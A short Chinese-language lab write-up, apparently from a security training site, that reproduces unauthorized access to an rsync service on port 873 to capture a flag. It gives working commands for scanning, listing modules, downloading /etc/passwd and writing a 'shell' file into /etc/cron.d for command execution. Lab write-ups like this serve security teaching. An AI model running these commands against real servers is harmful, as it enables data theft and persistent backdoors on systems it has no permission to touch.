漏洞描述:rsync是Linux/Unix下的一个远程数据同步工具,可通过LAN/WAN快速同步多台主机间的文件和目录,默认运行在873端口。由于配置不当,导致任何人可未授权访问rsync,上传本地文件,下载服务器文件。
rsync未授权访问带来的危害主要有两个:一是造成了严重的信息泄露;二是上传脚本后门文件,远程命令执行。
影响版本:全版本
参考资料:
- https://www.cnblogs.com/renhaoblog/p/13279101.html
- https://fansonfan.github.io/2019/04/20/rsync-%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/
- https://www.freebuf.com/column/202771.html
漏洞复现
- 使用nmap扫描目标系统是否开放
rsync服务
nmap -p 873 ip
![图片[1]-【初级】rsync-common 未授权访问-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/09/d2b5ca33bd232429.png)
- 使用以下两条命令,列出目标服务器的同步目录
rsync ip::rsync rsync://ip:873
![图片[2]-【初级】rsync-common 未授权访问-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/09/d2b5ca33bd232438.png)
- 在路径后面添加目录名即可查看目录中的文件
rsync ip::src
![图片[3]-【初级】rsync-common 未授权访问-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/09/d2b5ca33bd232454.png)
- 获取flag
![图片[4]-【初级】rsync-common 未授权访问-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/09/d2b5ca33bd232510.png)
其它操作
任意下载
rsync -av rsync://your-ip:873/src/etc/passwd ./
写入任意文件
rsync -av shell rsync://your-ip:873/src/etc/cron.d/shell© 版权声明
部分文章采集于互联网,若侵权请联系删除!
THE END
![表情[chi]-NGC660安全实验室](http://ngc660.cn/wp-content/themes/zibll/img/smilies/chi.gif)
![表情[xiaojiujie]-NGC660安全实验室](http://ngc660.cn/wp-content/themes/zibll/img/smilies/xiaojiujie.gif)
![表情[weiqu]-NGC660安全实验室](http://ngc660.cn/wp-content/themes/zibll/img/smilies/weiqu.gif)
![表情[qinqin]-NGC660安全实验室](http://ngc660.cn/wp-content/themes/zibll/img/smilies/qinqin.gif)
![表情[leiben]-NGC660安全实验室](http://ngc660.cn/wp-content/themes/zibll/img/smilies/leiben.gif)
![表情[baiyan]-NGC660安全实验室](http://ngc660.cn/wp-content/themes/zibll/img/smilies/baiyan.gif)
请登录后查看评论内容